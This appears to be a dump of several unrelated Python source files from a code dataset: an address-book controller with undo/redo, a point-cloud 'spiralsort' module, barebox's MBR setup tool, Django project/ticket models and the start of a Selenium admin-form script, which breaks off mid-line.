:exception NABException: if one of the parameters is not valid\n '''\n\n if not isinstance(personRepo, PersonRepository):\n raise NABException(\"The given repository of people is not valid.\")\n\n self.__personRepo = personRepo\n self.__operations = []\n self.__index = -1\n\n\n def number_of_people(self):\n '''\n Returns the numbers of people in the list.\n :return: natural number representing the number of people in the list\n '''\n\n return len(self.__personRepo)\n\n\n def add_person(self, person):\n '''\n Adds a person to the NAB.\n :param person: Person - person to be added to the NAB\n :return: person is added to the NAB\n :exception NABException: if one of the parameters is not valid or a person with that id already exists\n '''\n\n self.__personRepo.add(person)\n\n self.__operations[:] = self.__operations[:self.__index+1]\n self.__operations.append(AddOperation(deepcopy(person)))\n self.__index += 1\n\n\n def remove_person_by_id(self, id):\n '''\n Removes the person with the indicated ID from the list and their afferent activities.\n :param id: positive integer - ID of a person\n :return: the person with the indicated ID is removed as well as their afferent activities\n :exception NABException: if one of the parameters is not valid or no person with the given ID was found\n '''\n\n person = self.__personRepo.remove_by_id(id)\n\n self.__operations[:] = self.__operations[:self.__index+1]\n self.__operations.append(RemoveOperation(deepcopy(person)))\n self.__index += 1\n\n\n def update_person_name(self, person, name):\n '''\n Updates name of a person.\n :param person: Person to be updated\n :param name: new name for that person\n :return: person is updated\n :exception NABException: if one of the parameters is not valid or no person was found\n '''\n\n if person not in self.__personRepo:\n raise NABException(\"There's no such person in the list.\")\n\n oldPerson = deepcopy(person)\n person.name = name\n newPerson = deepcopy(person)\n\n self.__operations[:] = self.__operations[:self.__index+1]\n self.__operations.append(UpdateOperation(oldPerson, newPerson))\n self.__index += 1\n\n\n def update_person_phone(self, person, phone):\n '''\n Updates phone of a person.\n :param person: Person to be updated\n :param phone: new phone for that person\n :return: person is updated\n :exception NABException: if one of the parameters is not valid or no person was found\n '''\n\n if person not in self.__personRepo:\n raise NABException(\"There's no such person in the list.\")\n\n oldPerson = deepcopy(person)\n person.phone = phone\n newPerson = deepcopy(person)\n\n self.__operations[:] = self.__operations[:self.__index+1]\n self.__operations.append(UpdateOperation(oldPerson, newPerson))\n self.__index += 1\n\n\n def update_person_address(self, person, address):\n '''\n Updates address of a person.\n :param person: Person to be updated\n :param address: new address for that person\n :return: person is updated\n :exception NABException: if one of the parameters is not valid or no person was found\n '''\n\n if person not in self.__personRepo:\n raise NABException(\"There's no such person in the list.\")\n\n oldPerson = deepcopy(person)\n person.address = address\n newPerson = deepcopy(person)\n\n self.__operations[:] = self.__operations[:self.__index+1]\n self.__operations.append(UpdateOperation(oldPerson, newPerson))\n self.__index += 1\n\n\n def undo(self):\n '''\n Undoes the last operation that modified the repositories.\n :return: repositories are modified accordingly\n :exception NABException: if no undo is possible\n '''\n\n if self.__index == -1:\n raise NABException(\"# There's nothing to undo.\\n\")\n\n lastOperation = self.__operations[self.__index]\n\n if type(lastOperation) == AddOperation:\n self.__personRepo.remove_by_id(lastOperation.object().id)\n elif type(lastOperation) == RemoveOperation:\n self.__personRepo.add(lastOperation.object())\n elif type(lastOperation) == UpdateOperation:\n person = self.__personRepo.find_by_id(lastOperation.new().id)\n person.name = lastOperation.old().name\n person.address = lastOperation.old().address\n person.phone = lastOperation.old().phone\n else:\n raise NABException(\"# Not an undoable operation.\\n\")\n\n self.__index -= 1\n\n\n def redo(self):\n '''\n Redoes the last undo.\n :return: repositories are modified accordingly\n :exception NABException: if no redo is possible\n '''\n\n if self.__index+1 == len(self.__operations):\n raise NABException(\"# There's nothing to redo.\\n\")\n\n self.__index += 1\n lastOperation = self.__operations[self.__index]\n\n if type(lastOperation) == AddOperation:\n self.__personRepo.add(lastOperation.object())\n elif type(lastOperation) == RemoveOperation:\n self.__personRepo.remove_by_id(lastOperation.object().id)\n elif type(lastOperation) == UpdateOperation:\n person = self.__personRepo.find_by_id(lastOperation.old().id)\n person.name = lastOperation.new().name\n person.address = lastOperation.new().address\n person.phone = lastOperation.new().phone\n else:\n raise NABException(\"# Not a redoable operation.\\n\")\n\n\n def find_person_by_id(self, id):\n '''\n Returns the person from the current list with the indicated ID.\n :param id: positive integer - ID of a person\n :return: Person - the person with the ID id\n :exception NABException: if one of the parameters is not valid or no person with the given ID was found\n '''\n\n return self.__personRepo.find_by_id(id)\n\n\n def find_people_by_name(self, name):\n '''\n Returns a PersonRepository which contains only people with the indicated substring as part of their name.\n :param name: string - name to find people\n :return: PersonRepository - people with the indicated substring as part of their name\n :exception NABException: if one of the parameters is not valid\n '''\n\n return self.__personRepo.find_by_name(name)\n\n\n def find_people_by_address(self, address):\n '''\n Returns a PersonRepository which contains only people with the indicated substring as part of their address.\n :param address: string - address to find people\n :return: PersonRepository - people with the indicated substring as part of their address\n :exception NABException: if one of the parameters is not valid\n '''\n\n return self.__personRepo.find_by_address(address)\n\n\n def find_people_by_phone(self, phone):\n '''\n Returns a PersonRepository which contains only people with the indicated substring as part of their phone number.\n :param phone: string - phone number to find people\n :return: PersonRepository - people with the indicated substring as part of their phone number\n :exception NABException: if one of the parameters is not valid\n '''\n\n return self.__personRepo.find_by_phone(phone)\n\n\n def people_to_string(self):\n '''\n Returns a string representing the list of people in their short representation.\n :return: string - list of people or \"None\" if the list is empty\n '''\n\n return str(self.__personRepo)","sub_path":"sem1/fp/labs/lab12-13/NABManagement/controller/PeopleController.py","file_name":"PeopleController.py","file_ext":"py","file_size_in_byte":8425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"550284848","text":"\"\"\"\ninfo:\n file : core.py\n author : Thanasis Mattas\n license : GNU General Public License v3\n description : Usually, does some spiralsorting stuff\n\nSpiralSort is free software; you may redistribute it and/or modify it\nunder the terms of the GNU General Public License as published by the\nFree Software Foundation, either version 3 of the License, or (at your\noption) any later version. You should have received a copy of the GNU\nGeneral Public License along with this program. If not, see\n.\n\"\"\"\n\n\nimport numpy as np\nimport pandas as pd\n\nfrom spiralsort import utilities as util\n\n\ndef master_offset(nodes, master_node_id):\n \"\"\"offsets all nodes, so that master_node becomes the origin\"\"\"\n master_index = nodes.loc[nodes.node_id == master_node_id].index[0]\n nodes.x = nodes.x - nodes.loc[master_index, \"x\"]\n nodes.y = nodes.y - nodes.loc[master_index, \"y\"]\n nodes.z = nodes.z - nodes.loc[master_index, \"z\"]\n return nodes\n\n\ndef distances_from_node(nodes, node):\n \"\"\"evaluates the distances (norm I2) of nodes from node\n\n Args:\n nodes (df) : has node_id, x, y, z columns\n node (df)\n\n Returns:\n distances (array)\n \"\"\"\n distances = np.sqrt(\n (nodes.x - node.x) ** 2\n + (nodes.y - node.y) ** 2\n + (nodes.z - node.z) ** 2\n )\n return distances\n\n\ndef prev_node_gradient(prev_node):\n \"\"\"returns the angle of the prev_node vector from the 0x axis\n\n this is the angle that the point cloud will be rotated, in order to\n filter the counterclockwise side of the prev_node vector\n\n Args:\n prev_node (df) : columns: [\"node_id\", 'x', 'y', 'z', ...]\n\n Returns:\n theta (float) : the gradient of the prev_node in radians\n \"\"\"\n if ((prev_node.x < 0.001) and (prev_node.x > -0.001)\n and (prev_node.y >= 0)):\n theta = np.pi / 2\n elif ((prev_node.x < 0.001) and (prev_node.x > -0.001)\n and (prev_node.y < 0)):\n theta = - np.pi / 2\n elif prev_node.x >= 0.001:\n theta = np.arctan(prev_node.y / prev_node.x)\n # elif prev_node.iloc[0].x <= -0.001:\n else:\n theta = np.arctan(prev_node.y / prev_node.x) + np.pi\n return theta\n\n\ndef z_rotation(nodes, prev_node):\n \"\"\"2D rotation on z axis (linear transformation), such as prev_node\n will fall on the 0x axis\n\n transformation matrix:\n\n | cos(theta) sin(theta)|\n |-sin(theta) cos(theta)|\n\n theta > 0 : clockwise\n theta < 0 : counterclockwise\n\n Args:\n nodes (df) : the point cloud\n prev_node (df) : the node that will fall on the 0x axis\n\n Returns:\n rotated (df) : the point cloud after the rotation\n \"\"\"\n theta = prev_node_gradient(prev_node)\n rotated = nodes.copy()\n rotated.x = np.cos(theta) * nodes.x + np.sin(theta) * nodes.y\n rotated.y = - np.sin(theta) * nodes.x + np.cos(theta) * nodes.y\n return rotated\n\n\ndef counterclockwise_filter(nodes, prev_node):\n \"\"\"The goal is to force the algorithm to rotate anti-clockwise.\n Rotating the nodes, so that the vector of prev_node becomes the 0x\n axis, we keep only nodes with positive y, to find the next node from.\n\n Args:\n nodes (df) : the point cloud\n prev_node (df) : the last popped node\n\n Returns:\n (index) : the indexes of the filtered nodes\n \"\"\"\n nodes_rotated = z_rotation(nodes, prev_node)\n nodes_filtered_index = nodes_rotated[nodes_rotated.y > 0].index\n\n # don't counterclockwise filter if prev_node is the master_node\n # or no nodes are left after the filter\n if len(nodes_filtered_index):\n return nodes_filtered_index\n else:\n return nodes.index\n\n\ndef cost(nodes, prev_node):\n \"\"\"|node - master| + |node - prev_node|\n\n Args:\n nodes (df) : the point cloud\n prev_node (df) : the node from which to calculate the cost\n\n Returns:\n cost_ (series) : the cost column, to be inserted to the df\n \"\"\"\n cost_ = nodes[\"|node - master|\"].add(\n distances_from_node(nodes, prev_node)\n )\n return cost_\n\n\ndef cost_sort(nodes, prev_node, ignore_index=True):\n \"\"\"sorts the nodes by cost from prev_node\n\n cost = |node - master| + |node - prev_node|\n\n Args:\n nodes (df) : the point cloud\n prev_node (df) : the node from which to calculate the cost\n ignore_index (bool) : whether to keep or reset the old index\n (default True)\n\n Returns:\n nodes (df) : the point cloud, cost-sorted\n \"\"\"\n with pd.option_context(\"mode.chained_assignment\", None):\n nodes.loc[:, \"cost\"] = cost(nodes, prev_node)\n nodes.sort_values(\"cost\", inplace=True, kind=\"mergesort\",\n na_position=\"first\", ignore_index=ignore_index)\n return nodes\n\n\ndef pop_next_node(nodes, prev_node):\n \"\"\"\n 1. evaluate cost\n 2. pop the next_node (the one with the min cost)\n\n Args:\n nodes (df) : the point cloud\n prev_node (df) : the last popped node\n\n Returns:\n nodes (df) : the point cloud, without the currently\n popped node\n next_node_id (str)\n next_node (series)\n \"\"\"\n nodes_filtered = nodes.loc[counterclockwise_filter(nodes, prev_node)]\n\n # 1. evaluate cost\n nodes_filtered.loc[:, \"cost\"] = cost(nodes_filtered, prev_node)\n\n # 2. pop the next_node\n next_node_idx = nodes_filtered[\"cost\"].idxmin()\n next_node = nodes_filtered.loc[next_node_idx]\n next_node_id = next_node.node_id\n nodes = nodes[~nodes.index.isin([next_node.name])]\n return nodes, next_node_id, next_node\n\n\ndef spiral_stride(nodes,\n node_ids,\n prev_node,\n spiral_window,\n stride):\n \"\"\"moves one stride inside the spiral_window, iteretively popping\n nodes with respect to the min cost\n\n Args:\n nodes (df) : the nodes batch that the algorithm is\n woring on\n node_ids (list) : the so far spiral-sorted list of node_ids\n prev_node (df) : the last sorted (popped) node\n spiral_window (int) : the window of nodes that the algorithm\n will iteretively search for the next node\n stride (int) : the number of nodes to be sorted, before\n moving to the next spiral_window\n\n Returns:\n nodes (df) : the initially nodes batch, without the\n nodes popped at this stride\n node_ids (list) : the so far spiral-sorted list of node_ids\n updated with the nodes popped at this\n stride\n prev_node (df) : the last popped node at this stride\n \"\"\"\n # keep a temp node_ids list, not to search through the whole list\n node_ids_inner = []\n\n # for the first 1000 nodes dont filter the counterclockwise side\n # nodes, to prevent from oscilating on a lobe (half spherical disk)\n if len(node_ids) <= 1000:\n nodes_filtered = nodes[slice(0, spiral_window)]\n else:\n nodes_filtered = nodes.loc[counterclockwise_filter(nodes, prev_node)]\n nodes_filtered = cost_sort(nodes, prev_node)\n nodes_filtered = nodes_filtered[slice(0, spiral_window)]\n\n iters = min(stride, len(nodes_filtered.index))\n\n for _ in range(iters):\n nodes_filtered, prev_node_id, prev_node = pop_next_node(\n nodes_filtered,\n prev_node\n )\n node_ids_inner.append(prev_node_id)\n\n # drop node_ids_inner from nodes remainder\n nodes = nodes[~nodes.node_id.isin(node_ids_inner)]\n\n # update node_ids\n node_ids += node_ids_inner\n\n return nodes, node_ids, prev_node\n\n\ndef check_duplicated_ids(nodes):\n \"\"\"check node_ids uniqueness\"\"\"\n duplicated_ids = nodes[nodes.node_id.duplicated()].node_id.to_list()\n if duplicated_ids:\n raise Exception(\"node_id column has duplicated entries: {}\"\n .format(duplicated_ids))\n\n\ndef spiralsort(nodes, master_node_id):\n \"\"\"spiral-sorting the node-cloud, starting from the master node\n\n Spiral-sorting algorithm:\n 1. Sort the point cloud with respect to the distance from the master\n node and segment it into slices.\n 2. Take the first slice (2000 nodes\n 3. Take a SPIRAL_WINDOW (slice further)\n Spiral windows for the 1st slice consist of 300 nodes, starting\n from the last sorted node (the master_node for the 1st window)\n 4. Iteretively pop 20 nodes (a stride), by the minimum cost.\n (cost = |node - master_node| + |node - prev_node|)\n Take the next SPIRAL_WINDOW and pop the next 10 nodes.\n Continue until the remainder of the nodes reaches the size of the\n half slice (1000 nodes for the 1st slice).\n 5. Merge the remaining nodes with the next slice\n (This overlap of the slices ensures that there is a continuity\n while selecting the next nodes when the algorithm reaches the\n last nodes of the slice)\n 6. For the next slices, a filter is applied, which keeps only nodes\n from the counterclockwise side of the vector starting from the\n master node and ending at the previous node,in order to force the\n algorithm to move to a constant rotation direction\n 7. Keep moving by SPIRAL_WINDOWs (or strides), counterclockwise\n filtering at each stride, popping 10s of nodes until the half\n slice thresshold\n 8. Upon reaching the last slice, remove the half_slice threshold, to\n pop all the remaining nodes.\n\n Args:\n nodes (df) : the box_nodes (without the bar_nodes)\n master_node_id (str) : the node on the box surface where the\n deformation starts\n\n Returns:\n nodes_sorted (df) : the nodes spiral-sorted, starting from\n the master node\n \"\"\"\n # first, check if the node_ids are unique\n check_duplicated_ids(nodes)\n\n # final sequence of ids, used to sort the final dataframe,\n # initialized with the master node\n node_ids = [master_node_id]\n\n # make master_node the origin of the axes\n nodes = master_offset(nodes, master_node_id)\n\n # initialize previous node with the master node (series)\n master_node = nodes.loc[nodes[\"node_id\"] == master_node_id]\n prev_node = master_node.iloc[0]\n\n # drop master node\n nodes.drop(master_node.index, inplace=True)\n\n # distance of all nodes from the master node\n nodes[\"|node - master|\"] = distances_from_node(nodes, prev_node)\n\n # distance-sort from master_node\n nodes.sort_values(\"|node - master|\", inplace=True, kind=\"mergesort\",\n ignore_index=True)\n\n # segment nodes into slices, not to work on the whole df\n # [\n # [0, 2000], [2000, 6000], [6000, 14000], [14000, 30000],\n # [30000, 62000], [62000, 94000], [94000, 126000], ...\n # ]\n slices = util.create_slices(nodes)\n\n # number of nodes anti-clockwise filtered and cost_sorted from prev\n # node, in order to iteretively pop the next nodes in the STRIDE\n SPIRAL_WINDOW = 400\n STRIDE = 15\n\n # this is the container that the sorting algorithm will work with\n remaining_nodes = pd.DataFrame(columns=nodes.columns)\n\n for idx, slicing_obj in enumerate(slices):\n\n # moving to more distant slices, spiral_window gets bigger, as\n # the nodes are more spread out away from the master node\n spiral_window = int(SPIRAL_WINDOW + 100 * idx)\n\n # Concat with the remainder of the nodes (which is the half of\n # the previous slice), in order to have continuity.\n # (For example, previous to last node will only have the last\n # remaining node to find the next cost-sorted node, which is\n # not correct, because there are other candidates, not included\n # in the current slice.)\n remaining_nodes = pd.concat([remaining_nodes, nodes[slicing_obj]])\n\n half_slice = util.calc_half_slice(slicing_obj)\n\n # leave half_slice remaining nodes to merge with the next slice\n # except from the last slice\n if (slicing_obj in slices[: -1]) and (len(slices) > 1):\n spiral_iters = (len(remaining_nodes.index) - half_slice) // STRIDE\n else:\n spiral_iters = len(remaining_nodes.index) // STRIDE\n\n for _ in range(spiral_iters):\n remaining_nodes, node_ids, prev_node = spiral_stride(\n remaining_nodes,\n node_ids,\n prev_node,\n spiral_window,\n STRIDE\n )\n\n # return master node to nodes\n nodes = pd.concat([master_node, nodes])\n # reorder nodes with respect to the spiral-sorted node_ids\n node_ids = pd.DataFrame({\"node_id\": node_ids})\n nodes_sorted = node_ids.merge(nodes, on=\"node_id\") \\\n .loc[:, [\"node_id\", 'x', 'y', 'z']] \\\n .reset_index(drop=True, inplace=False)\n\n return nodes_sorted\n","sub_path":"spiralsort/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":13216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"45071101","text":"# Copyright (C) 2009 Juergen Beisert, Pengutronix\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as\n# published by the Free Software Foundation; either version 2 of\n# the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston,\n# MA 02111-1307 USA\n#\n\n#\n# @file\n# @brief Write the barebox binary to the MBR and the following disk sectors\n#\n# Also patch dedicated locations in the image to make it work at runtime\n#\n# Current restrictions are:\n# - only installs into MBR and the sectors after it\n# - tested only with QEMU\n# - and maybe some others\n#\n\nimport os.path\n\nscript_path = os.path.dirname(__file__)\n\ndef values2string(values):\n import sys\n if sys.version_info[0]==2:\n return \"\".join(map(chr, values))\n else:\n return bytes(values)\n\ndef populate_globals_from_header(header_file):\n f = open(header_file, \"r\")\n for line in f.readlines():\n line = line.strip()\n if line.startswith(\"#define\"):\n (variable, value) = line[len(\"#define\"):].strip().split(\" \")\n globals()[variable] = eval(value)\n\npopulate_globals_from_header(os.path.join(script_path, \"barebox.lds.h\"))\n\nclass Field(object):\n def __init__(self, start, size):\n self.start = start\n self.size = size\n\n def __get__(self, instance, owner):\n start = instance.start_offset + self.start\n values = instance.array[start:start+self.size]\n powers = range(len(values))\n powers = map(lambda x: 256**x, powers)\n summands = map(int.__mul__, values, powers)\n return sum(summands)\n\n def __set__(self, instance, value):\n if value >= 2**(self.size*8):\n raise ValueError(\"%u does not fit in this field\" % value)\n powers = []\n while value!=0:\n powers.append( int(value % 256) )\n value /= 256\n powers.extend( self.size*[0] )\n start = instance.start_offset + self.start\n\n instance.array[start:start+self.size] = values2string(powers[0:self.size])\n\nclass ClassWithLength(type):\n def __len__(self):\n return self.clslength()\n\nclass StructTemplate(object, metaclass=ClassWithLength):\n #__metaclass__ = ClassWithLength\n\n @classmethod\n def clslength(cls):\n len = 0\n for attr in cls.__dict__.values():\n if isinstance(attr, Field):\n len += attr.size\n return len\n\n def __len__(self):\n return len(self.__class__)\n\nclass DAPS(StructTemplate):\n def __init__(self, array, start_offset):\n self.array = array\n self.start_offset = start_offset\n\n size = Field(0, 1)\n res1 = Field(1, 1)\n count = Field(2, 1)\n res2 = Field(3, 1)\n offset = Field(4, 2)\n segment = Field(6, 2)\n lba = Field(8, 8)\n\nclass Partition(StructTemplate):\n def __init__(self, array, start_offset):\n self.array = array\n self.start_offset = start_offset\n\n boot_indicator = Field(0, 1)\n chs_begin = Field(1, 3)\n type = Field(4, 1)\n chs_end = Field(5, 3)\n partition_start = Field(8, 4)\n partition_size = Field(12, 4)\n\ndef target2host_32(value):\n return value\n\ndef host2target_16(value):\n return value\n\ndef host2target_64(value):\n return value\n\nclass SetupMbrError:\n pass\n\ndef fill_daps(sector, count, offset, segment, lba):\n assert count < 128\n assert offset < 0x10000\n assert segment < 0x10000\n\n sector.size = len(sector)\n sector.res1 = 0\n sector.count = count\n sector.res2 = 0\n sector.offset = host2target_16(offset)\n sector.segment = host2target_16(segment)\n sector.lba = host2target_64(lba)\n\n return True\n\ndef invalidate_daps(sector):\n sector.size = MARK_DAPS_INVALID\n sector.res1 = 0\n\ndef barebox_linear_image(hd_image, daps_table, size):\n offset = LOAD_AREA\n segment = LOAD_SEGMENT\n i = 0\n lba = 2\n\n size -= 2 * SECTOR_SIZE\n size = (size + SECTOR_SIZE - 1) & ~(SECTOR_SIZE - 1)\n\n if (size >= (SECTOR_SIZE / len(DAPS) - 1) * 32 * 1024):\n print(\"Image too large to boot. Max size is %u kiB, image size is %u kiB\" %\n ((SECTOR_SIZE / len(DAPS) - 1) * 32, size / 1024)\n )\n return False\n\n if size > 32 * 1024:\n next_offset = (offset + 32 * 1024 -1) & ~0x7fff\n chunk_size = next_offset - offset\n if chunk_size & (SECTOR_SIZE-1):\n print(\"Unable to pad from %X to %X in multiple of sectors\" % (offset, next_offset))\n return False\n\n rc = fill_daps(DAPS(hd_image, daps_table+i*len(DAPS)), chunk_size / SECTOR_SIZE, offset, segment, lba)\n if not rc:\n print(\"Couldn't fill the DAPS\")\n return False\n\n size -= chunk_size\n i += 1\n lba += chunk_size / SECTOR_SIZE\n offset += chunk_size\n if offset >= 0x10000:\n segment += 4096\n offset = 0\n\n while size:\n if size >= 32 * 1024:\n if i >= (SECTOR_SIZE / len(DAPS)):\n print(\"Internal tool error: Too many DAPS entries!\")\n return False\n rc = fill_daps(DAPS(hd_image, daps_table+i*len(DAPS)), 64, offset, segment, lba)\n if not rc:\n return False\n \n size -= 32 * 1024\n lba += 64\n offset += 32 * 1024\n if offset >= 0x10000:\n segment += 4096\n offset = 0\n i += 1\n else:\n if i >= SECTOR_SIZE / len(DAPS):\n print(\"Internal tool error: Too many DAPS entries!\")\n return False\n rc = fill_daps(DAPS(hd_image, daps_table+i*len(DAPS)), size / SECTOR_SIZE, offset, segment, lba)\n if not rc:\n return False\n size = 0\n i += 1\n else:\n rc = fill_daps(DAPS(hd_image, daps_table+i*len(DAPS)), size / SECTOR_SIZE, offset, segment, lba)\n if not rc:\n return False\n i += 1\n\n if i >= (SECTOR_SIZE / len(DAPS)):\n return True\n\n # mark the last DAPS invalid\n invalidate_daps( DAPS(hd_image, daps_table + i*len(DAPS)) )\n\n return True\n\ndef check_for_valid_mbr(sector, size):\n if size < SECTOR_SIZE:\n print(\"MBR too small to be valid\")\n return False\n if (sector[OFFSET_OF_SIGNATURE] != 0x55) or \\\n (sector[OFFSET_OF_SIGNATURE+1] != 0xAA):\n print(\"No MBR signature found\")\n return False\n return True\n\ndef check_for_space(hd_image, size):\n if not check_for_valid_mbr(hd_image, size):\n return False\n\n partition = Partition(hd_image, OFFSET_OF_PARTITION_TABLE)\n\n spare_sector_count = target2host_32( partition.partition_start )\n\n print(\"Debug: Required free sectors for barebox prior first partition: %u, hd image provides: %u\" % (\n (size + SECTOR_SIZE - 1) / SECTOR_SIZE,\n spare_sector_count))\n\n spare_sector_count *= SECTOR_SIZE\n if spare_sector_count < size:\n print(\"Not enough space after MBR to store minibox\")\n print(\"Move begin of the first partition beyond sector %u\" % ((size + SECTOR_SIZE - 1) / SECTOR_SIZE))\n return False\n return True\n\ndef barebox_overlay_mbr(fd_barebox, fd_hd):\n import mmap, os\n sb = os.fstat(fd_barebox.fileno())\n barebox_image = mmap.mmap(fd_barebox.fileno(), 0, access=mmap.ACCESS_READ)\n\n check_for_valid_mbr(barebox_image, sb.st_size)\n\n required_size = sb.st_size\n hd_image = mmap.mmap(fd_hd.fileno(), required_size, access=mmap.ACCESS_WRITE)\n\n check_for_space(hd_image, required_size)\n\n # embed barebox's boot code into the disk drive image\n hd_image[0:OFFSET_OF_PARTITION_TABLE] = barebox_image[0:OFFSET_OF_PARTITION_TABLE]\n\n\t# embed the barebox main image into the disk drive image,\n\t# but keep the persistant environment storage untouched\n\t# (if defined), e.g. store the main image behind this special area.\n hd_image_start = SECTOR_SIZE\n barebox_image_start = SECTOR_SIZE\n size = sb.st_size - SECTOR_SIZE\n hd_image[hd_image_start:hd_image_start+size] = barebox_image[barebox_image_start:barebox_image_start+size]\n\n embed = PATCH_AREA\n indirect = SECTOR_SIZE\n\n fill_daps(DAPS(hd_image, embed), 1, INDIRECT_AREA, INDIRECT_SEGMENT, 1)\n\n rc = barebox_linear_image(hd_image, indirect, sb.st_size)\n if not rc:\n return False\n\n hd_image.close()\n barebox_image.close()\n\ndef main(argv):\n from optparse import OptionParser\n parser = OptionParser()\n parser.add_option(\"-m\", dest=\"barebox_image_filename\",\n help=\"\")\n parser.add_option(\"-d\", dest=\"hd_image_filename\",\n help=\"\")\n\n (options, args) = parser.parse_args(argv)\n\n fd_barebox_image = open(options.barebox_image_filename, \"r+b\")\n fd_hd_image = open(options.hd_image_filename, \"a+b\")\n\n barebox_overlay_mbr(fd_barebox_image, fd_hd_image)\n\n fd_barebox_image.close()\n fd_hd_image.close()\n\nif __name__==\"__main__\":\n import sys\n main(sys.argv[1:])\n","sub_path":"setupmbr.py","file_name":"setupmbr.py","file_ext":"py","file_size_in_byte":9514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"611722868","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django import forms\nfrom django.forms import ModelForm\nfrom django.shortcuts import get_object_or_404, redirect\n\nclass Project(models.Model):\n\tname = models.CharField(max_length = 20)\n\tdescription = models.CharField(max_length = 200)\n\tstart_date = models.DateField()\n\tend_date = models.DateField()\n\towner = models.ForeignKey(User, related_name=\"projects_owner\")\n\tusers = models.ManyToManyField(User, related_name=\"projects_users\")\n\n\tdef __unicode__(self):\n\t\treturn self.name\n\n\tdef user_can_manage(self, owner):\n\t\treturn owner == self.owner \n\n\t@classmethod\n\tdef get_manageable_object_or_404(cls, user, *args, **kwds):\n\t\titem = get_object_or_404(cls, *args, **kwds)\n\t\tif not item.user_can_manage(user):\n\t\t\treturn False\n\t\treturn item\n\n\tdef user_can_see(self, users):\n\t\treturn self.users.filter(id=users.id).exists()\n\n\t@classmethod\n\tdef get_showable_object_or_404(cls, user, *args, **kwds):\n\t\titem = get_object_or_404(cls, *args, **kwds)\n\t\tif not item.user_can_see(user):\n\t\t\treturn False\n\t\treturn item\n\n\tclass Meta:\n\t\tpermissions = (\n\t\t\t(\"can_add_projects_web\", \"Can add projects through the web\"),\n\t\t)\n\nclass Status(models.Model):\n\tstatus = models.CharField(max_length = 20)\n\n\tdef __unicode__(self):\n\t\treturn self.status\n\nclass Ticket(models.Model):\n\tname = models.CharField(max_length = 20)\n\tdescription = models.CharField(max_length = 200)\n\tstatus = models.ForeignKey(Status, related_name=\"tickets_status\")\n\tproject = models.ForeignKey(Project, related_name=\"tickets_project\")\n\towner = models.ForeignKey(User, related_name=\"tickets_owner\")\n\n\tdef __unicode__(self):\n\t\treturn self.name\n\n\tdef user_can_manage(self, owner):\n\t\treturn owner == self.owner \n\n\t@classmethod\n\tdef get_manageable_object_or_404(cls, user, *args, **kwds):\n\t\titem = get_object_or_404(cls, *args, **kwds)\n\t\tif not item.user_can_manage(user):\n\t\t\treturn False\n\t\treturn item\n\t\t\n\tclass Meta:\n\t\tpermissions = (\n\t\t\t(\"can_add_tickets_web\", \"Can add tickets through the web\"),\n\t\t)\n\nclass TicketForm(forms.ModelForm):\n\tstatus = forms.ModelChoiceField(queryset=Status.objects.all())\n\tclass Meta:\n\t\tmodel = Ticket\n\t\texclude = ('owner', 'project')\n\t\t\nclass LoginForm(forms.Form):\n\t username = forms.CharField(max_length = 30)\n\t password = forms.CharField(max_length = 128, widget=forms.PasswordInput)\n\n\n\n\n\nclass ProjectForm(ModelForm):\n\tdef __init__(self, user_id, *args, **kwargs):\n\t\tsuper(ProjectForm, self).__init__(*args, **kwargs)\n\t\tself.fields['users'].queryset = \\\n\t\tUser.objects.exclude(id = user_id)\n\tclass Meta:\n\t\tmodel = Project\n\t\texclude = ('owner_id')","sub_path":"Projectmanager/project_manager/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"27476009","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.wait import WebDriverWait\nimport os\n\n\n# 'General' tab\ndef general_tab(driver):\n # set Status to Enable\n driver.find_element_by_css_selector(\"div#tab-general input[name=status]\").click()\n # input Name = \"test product\"\n driver.find_element_by_css_selector(\"div#tab-general input[name='name[en]']\").send_keys(\"test product\")\n # enter Code = \"12345\"\n driver.find_element_by_css_selector(\"div#tab-general input[name=code]\").send_keys(\"12345\")\n # uncheck Root and check \"Rubber Ducks\" category\n driver.find_element_by_css_selector(\"div#tab-general input[data-name=Root]\").click()\n driver.find_element_by_css_selector(\"div#tab-general input[data-name='Rubber Ducks']\").click()\n # select \"Rubber Ducks\" in Default Category select\n select = Select(driver.find_element_by_name(\"default_category_id\"))\n select.select_by_visible_text(\"Rubber Ducks\")\n # check Gender to \"Unisex\"\n driver.find_element_by_css_selector(\"div#tab-general input[name='product_groups[]'][value='1-3']\").click()\n # set Quantity to 12\n quantity = driver.find_element_by_css_selector(\"div#tab-general input[name=quantity]\")\n ActionChains(driver).move_to_element(quantity).double_click(quantity).perform()\n quantity.send_keys(\"12\")\n ActionChains(driver).move_by_offset(120,120).click().perform()\n # Upload Images from the current directory\n cwd = os.getcwd()\n path = cwd + \"/ball.png\"\n driver.find_element_by_css_selector(\"div#tab-general input[name='new_images[]']\").send_keys(path)\n # set Date Valid From to \"15.11.2016\"\n driver.find_element_by_css_selector(\"div#tab-general input[name=date_valid_from]\").send_keys(\"15.11.2016\")\n # set Date Valid To to \"15.12.2017\"\n driver.find_element_by_css_selector(\"div#tab-general input[name=date_valid_to]\").send_keys(\"15.12.2017\")\n\n\ndef information_tab(driver):\n # select the last element in Manufacturer select\n select = Select(driver.find_element_by_css_selector(\"div#tab-information [name=manufacturer_id]\"))\n select.select_by_index(len(select.options)-1)\n # select the last element in Supplier select\n select = Select(driver.find_element_by_css_selector(\"div#tab-information [name=supplier_id]\"))\n select.select_by_index(len(select.options)-1)\n # input Keyword\n driver.find_element_by_css_selector(\"div#tab-information [name=keywords]\").send_keys(\"test keyword\")\n # enter text \"small ball\" to Short Description\n 